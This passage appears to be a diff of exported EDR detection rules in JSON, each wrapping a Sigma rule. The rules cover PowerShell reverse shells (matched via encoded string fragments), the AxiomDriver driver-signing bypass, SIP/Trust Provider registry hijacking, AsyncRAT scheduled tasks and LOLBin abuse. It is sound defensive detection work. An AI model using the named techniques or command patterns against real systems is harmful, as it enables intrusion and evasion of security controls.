'JABiADYANAAgAD0AIAAiAFEAaABBAEEAQgBtAEYAagBkAEcAbAB2AGIAaABBAEEARAAzAFIAbABjADMAUgBmAFkAMgA5AHUAYgBtAFYAagBkAEcAbAB2AGIAawBBAD0A'\n - 'QAYgA2ADQAIAA9ACAAIgBRAGgAQQBBAEIAbQBGAGoAZABHAGwAdgBiAGgAQQBBAEQAMwBSAGwAYwAzAFIAZgBZADIAOQB1AGIAbQBWAGoAZABHAGwAdgBiAGsAQQA9A'\n - 'kAGIANgA0ACAAPQAgACIAUQBoAEEAQQBCAG0ARgBqAGQARwBsAHYAYgBoAEEAQQBEADMAUgBsAGMAMwBSAGYAWQAyADkAdQBiAG0AVgBqAGQARwBsAHYAYgBrAEEAPQ'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a", + "rule_name": "PowerShell Reverse Shell Executed", + "rule_description": "Detects suspicious reverse shell execution via PowerShell.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\n", + "rule_creation_date": "2022-07-01", + "rule_modified_date": "2026-03-10", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1095" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + 
"backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.071468Z", + "creation_date": "2026-03-23T11:45:34.071470Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.071474Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/mallo-m", + "https://github.com/ASkyeye/CVE-2018-19320" + ], + "name": "t1562_001_axiomdriver_created.yml", + "content": "title: AxiomDriver Created\nid: 2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb\ndescription: |\n Detects the creation of the Axiom driver.\n Axiom are tools used for malicious activities such as dumping the LSASS' process memory or loading shellcodes using different techniques to avoid being detected by security tools such as EDRs.\n Axiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\n It is recommended to investigate the execution context and drivers loaded before this one to determine if a vulnerable driver has not already been loaded beforehand to disable DSE.\nreferences:\n - https://github.com/mallo-m\n - https://github.com/ASkyeye/CVE-2018-19320\ndate: 2025/03/26\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\Drivers\\AxiomDriver.sys'\n\n condition: selection\nlevel: critical\nconfidence: 
strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb", + "rule_name": "AxiomDriver Created", + "rule_description": "Detects the creation of the Axiom driver.\nAxiom are tools used for malicious activities such as dumping the LSASS' process memory or loading shellcodes using different techniques to avoid being detected by security tools such as EDRs.\nAxiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\nIt is recommended to investigate the execution context and drivers loaded before this one to determine if a vulnerable driver has not already been loaded beforehand to disable DSE.\n", + "rule_creation_date": "2025-03-26", + "rule_modified_date": "2025-03-31", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2a653231-c597-40e1-b664-2415c9a4a2e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:35.296105Z", + "creation_date": "2026-03-23T11:45:35.296108Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.296115Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode", + "https://attack.mitre.org/techniques/T1553/003/" + ], + "name": "t1553_003_sip_trust_provider_hijacking.yml", + "content": "title: SIP or Trust Provider Hijacked via Registry Modification\nid: 2a653231-c597-40e1-b664-2415c9a4a2e4\ndescription: |\n Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\n SIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. 
This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\n Investigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\nreferences:\n - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\n - https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode\n - https://attack.mitre.org/techniques/T1553/003/\ndate: 2026/01/29\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.003\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_dll:\n EventType: SetValue\n TargetObject:\n # SIP Signature retrieval DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n # Hash validation DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n\n selection_funcname:\n EventType: SetValue\n TargetObject:\n # SIP signature retrieval function\n - 
'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n # Hash validation function\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n\n selection_filetype:\n TargetObject|contains:\n - '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}' # PEs\n - '{603BCC1F-4B59-4E08-B724-D2C6297EF351}' # PowerShell\n - '{DE351A43-8E59-11D0-8C47-00C04FC295EE}' # Catalog\n - '{000C10F1-0000-0000-C000-000000000046}' # MSI\n - '{C689AABA-8E78-11D0-8C47-00C04FC295EE}' # Cabinet\n\n filter_legitimate_dll:\n Details:\n - 'mso.dll'\n - 'WINTRUST.DLL'\n - 'MSISIP.DLL'\n - '?:\\Program Files\\ReasonLabs\\EPP\\x64\\rsSIPProvider.dll'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - '?:\\Windows\\SysWOW64\\AppxSip.dll'\n - '?:\\Windows\\System32\\AppxSip.dll'\n - '?:\\Windows\\SysWOW64\\wshext.dll'\n - '?:\\Windows\\System32\\wshext.dll'\n - '?:\\Windows\\SysWOW64\\MSISIP.DLL'\n - '?:\\Windows\\System32\\MSISIP.DLL'\n - '?:\\Windows\\SysWOW64\\pwrshsip.dll'\n - '?:\\Windows\\System32\\pwrshsip.dll'\n\n filter_legitimate_funcname:\n Details:\n # Verify Indirect Data\n - 'MsoVBADigSigVerifyIndirectData'\n - 'CryptSIPVerifyIndirectData'\n - 'SIPVerifyIndirectData'\n - 'PsVerifyHash'\n - 'MsiSIPVerifyIndirectData'\n\n # Get Signed Data\n - 'MsoVBADigSigGetSignedDataMsg'\n - 'CryptSIPGetSignedDataMsg'\n - 'SIPGetSignedDataMsg'\n - 'PsGetSignature'\n - 'MsiSIPGetSignedDataMsg'\n\n condition: (\n (selection_dll and not 
filter_legitimate_dll) or\n (selection_funcname and not filter_legitimate_funcname)\n )\n and selection_filetype # and not 1 of exclusion_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2a653231-c597-40e1-b664-2415c9a4a2e4", + "rule_name": "SIP or Trust Provider Hijacked via Registry Modification", + "rule_description": "Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\nSIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. 
This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\nInvestigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\n", + "rule_creation_date": "2026-01-29", + "rule_modified_date": "2026-02-17", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1553.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.616863Z", + "creation_date": "2026-03-23T11:45:34.616866Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.616891Z", + "rule_level": "high", + "rule_confidence": "strong", + 
"rule_confidence_override": null, + "references": [ + "https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/", + "https://attack.mitre.org/techniques/T1036/004/", + "https://attack.mitre.org/techniques/T1036/005/" + ], + "name": "t1030_004_susp_plist_masquerading_apple.yml", + "content": "title: Suspicious Plist Masquerading Apple Name\nid: 2a93d0e0-f93d-4c54-a111-ce4c67fdc506\ndescription: |\n Detects the creation of a launch daemon or agent impersonating Apple.\n Adversaries may install persistence impersonating Apple in order to bypass simple security controls.\n It is recommended to check the content of the newly created persistence.\nreferences:\n - https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|contains: # create\n - '/Library/LaunchDaemons/'\n - '/Library/LaunchAgents/'\n - TargetPath|contains: # rename\n - '/Library/LaunchAgents/'\n - '/Library/LaunchDaemons/'\n selection_kind:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_name:\n - Path|endswith: 'com.apple.*'\n - TargetPath|endswith: 'com.apple.*'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506", + "rule_name": "Suspicious Plist Masquerading Apple Name", + "rule_description": "Detects the creation of a launch daemon or agent 
impersonating Apple.\nAdversaries may install persistence impersonating Apple in order to bypass simple security controls.\nIt is recommended to check the content of the newly created persistence.\n", + "rule_creation_date": "2024-06-18", + "rule_modified_date": "2025-10-29", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1036.004", + "attack.t1036.005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2aa99981-34d6-4623-8d69-576d9828ba9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.626100Z", + "creation_date": "2026-03-23T11:45:34.626102Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.626106Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines", + "https://attack.mitre.org/techniques/T1564/006/" + ], + "name": "t1564_006_enable_hyperv.yml", + "content": "title: Windows Hyper-V Enabled\nid: 
2aa99981-34d6-4623-8d69-576d9828ba9c\ndescription: |\n Detects the activation of Windows Hyper-V virtualization feature.\n This command enables the Hyper-V virtualization platform and its required components on Windows without restarting the system.\n Attackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistent.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2025/11/12\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Dism.exe'\n - OriginalFileName: 'DISM.EXE'\n\n selection_command:\n CommandLine|contains|all:\n - ' ?online'\n - ' ?enable-feature'\n - ' ?all'\n - ' ?featurename:microsoft-hyper-v'\n - ' ?norestart'\n\n exclusion_docker:\n ParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\chocolatey\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2aa99981-34d6-4623-8d69-576d9828ba9c", + "rule_name": "Windows Hyper-V Enabled", + "rule_description": "Detects the activation of Windows Hyper-V virtualization feature.\nThis command enables the Hyper-V virtualization platform and its 
required components on Windows without restarting the system.\nAttackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistent.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n", + "rule_creation_date": "2025-11-12", + "rule_modified_date": "2025-12-29", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1564.006" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2aaef300-223b-4962-a97a-3b22e67f8221", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.085739Z", + "creation_date": "2026-03-23T11:45:34.085741Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.085746Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Hh/", + "https://attack.mitre.org/techniques/T1218/", + "https://attack.mitre.org/techniques/T1105/" + ], + "name": "t1218_hh.yml", + "content": "title: Hh.exe 
Execution\nid: 2aaef300-223b-4962-a97a-3b22e67f8221\ndescription: |\n Detects the execution of hh.exe Windows binary which is used to process chm files on Windows.\n This binary can be abused by attackers to download remote files or execute binaries.\n It is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Hh/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/07/12\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\hh.exe'\n - OriginalFileName: 'HH.exe'\n filter_chm:\n CommandLine|endswith:\n - '.chm'\n - '.chm\"'\n\n exclusion_ibm:\n ParentImage:\n - '?:\\Program Files (x86)\\IBM\\Personal Communications\\pcsws.exe'\n - '?:\\Program Files\\Personal Communications\\pcsws.exe'\n\n exclusion_autohotkey:\n ParentImage|endswith: '\\AutoHotkey.exe'\n # C:\\Windows\\hh.exe ms-its:C:\\Program Files\\AutoHotkey\\AutoHotkey.chm::/docs/Welcome.htm\n CommandLine|contains: 'ms-its:*AutoHotkey.chm::/docs/'\n\n exclusion_lenovo:\n CommandLine|contains: '?:\\Program Files (x86)\\Lenovo\\Update Retriever\\'\n\n exclusion_fiduexpert:\n Image|endswith: '\\RF Logiciels\\Fidu-Expert*\\hh.exe'\n ParentImage|endswith: '\\RF Logiciels\\Fidu-Expert*\\FiduExpert.exe'\n\n exclusion_eic:\n # https://www.eic.fr/\n Image: '?:\\EIC\\DR\\Application *\\hh.exe'\n ParentImage: '?:\\EIC\\DR\\Application *\\dr.exe'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n 
condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2aaef300-223b-4962-a97a-3b22e67f8221", + "rule_name": "Hh.exe Execution", + "rule_description": "Detects the execution of hh.exe Windows binary which is used to process chm files on Windows.\nThis binary can be abused by attackers to download remote files or execute binaries.\nIt is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\n", + "rule_creation_date": "2021-07-12", + "rule_modified_date": "2025-11-05", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1105", + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.622939Z", + "creation_date": "2026-03-23T11:45:34.622941Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:34.622945Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html", + "https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/", + "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", + "https://attack.mitre.org/techniques/T1053/005/", + "https://lolbas-project.github.io/lolbas/Binaries/Schtasks/" + ], + "name": "t1053_005_asyncrat_scheduled_task.yml", + "content": "title: AsyncRAT Scheduled Task Created\nid: 2acfef72-9bfe-4583-9f0a-0fdbec088a28\ndescription: |\n Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\n Attackers often used scheduled task to persistently execute malicious code.\n It is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\nreferences:\n - https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/\n - https://attack.mitre.org/techniques/T1053/005/\n - https://lolbas-project.github.io/lolbas/Binaries/Schtasks/\ndate: 2022/08/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Schtasks\n - classification.Windows.HackTool.AsyncRAT\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_cmd1:\n CommandLine|contains:\n - '/create '\n - '-create '\n - ' create '\n selection_cmd2:\n CommandLine|contains:\n - '/tn '\n - '-tn '\n\n 
selection_specific_asyncrat_1:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Roaming\\'\n\n selection_specific_asyncrat_2:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Local\\Temp\\'\n\n selection_specific_public_directory_1:\n CommandLine|contains|all:\n - '/sc minute /mo'\n - '\\Users\\Public\\'\n\n selection_specific_public_directory_2:\n CommandLine|contains|all:\n - '/Create /XML'\n - '\\Users\\Public\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_psappdeploytoolkit:\n # C:\\WINDOWS\\System32\\schtasks.exe /create /f /tn DeltaManager_2.0.0.2_1.0_2.0.0.2_FR_BlockedApps /xml C:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml\n CommandLine:\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\PSAppDeployToolkit-ExecuteAsUser.xml*'\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml*'\n\n exclusion_wapt:\n ParentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n condition: selection_bin and all of selection_cmd* and 1 of selection_specific_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28", + "rule_name": "AsyncRAT Scheduled Task Created", + "rule_description": "Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\nAttackers often used scheduled task to persistently execute malicious code.\nIt is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\n", + "rule_creation_date": "2022-08-22", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation" + ], + 
"rule_technique_tags": [ + "attack.t1053.005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2b08e300-2cbf-4b7f-8b71-d33804657613", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.622461Z", + "creation_date": "2026-03-23T11:45:34.622463Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.622467Z", + "rule_level": "low", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + 